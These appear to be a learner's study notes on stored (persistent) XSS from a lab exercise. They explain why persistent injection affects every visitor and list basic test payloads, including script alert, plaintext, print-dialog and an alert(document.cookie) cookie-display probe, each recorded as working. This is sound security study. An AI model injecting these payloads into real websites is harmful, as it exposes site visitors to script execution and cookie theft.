# Intro - The most critical type of XSS vulnerability is `Stored XSS` or `Persistent XSS` - If our injected XSS payload gets stored in the back-end database and retrieved upon visiting the page, this means that our XSS attack is persistent and may affect any user that visits the page - This makes this type of XSS the most critical, as it affects a much wider audience since any user who visits the page would be a victim of this attack - Furthermore, Stored XSS may not be easily removable, and the payload may need removing from the back-end database # XSS Testing Payload - Basic XSS payload ```html <script>alert(window.origin)</script> ``` - If successful, the below alert will be shown and the below will be shown in the page source when pressing [crt+u] ![[images/Pasted image 20251212195425.png]] ```html <div></div><ul class="list-unstyled" id="todo"><ul><script>alert(window.origin)</script> </ul></ul> ``` - Other XSS payload - As some modern browsers may block the `alert()` JavaScript function in specific locations, it may be handy to know a few other basic XSS payloads to verify the existence of XSS - `<plaintext>`will stop rendering the HTML code that comes after it and display it as plaintext - `<script>print()</script>` will pop up the browser print dialog, which is unlikely to be blocked by any browsers # Exercise - try basic alert payload > works ```html <script>alert(window.origin)</script> ``` ![[images/Pasted image 20251212200824.png]] - try below plaintext payload > works ```html <plaintext> ``` ![[images/Pasted image 20251212200004.png]] - try print dialog payload > works ```html <script>print()</script> ``` ![[images/Pasted image 20251212200058.png]] - try to leak cookie with below modified alert payload > works ```html <script>alert(document.cookie)</script> ``` ![[images/Pasted image 20251212200405.png]]![[images/Pasted image 20251212200420.png]]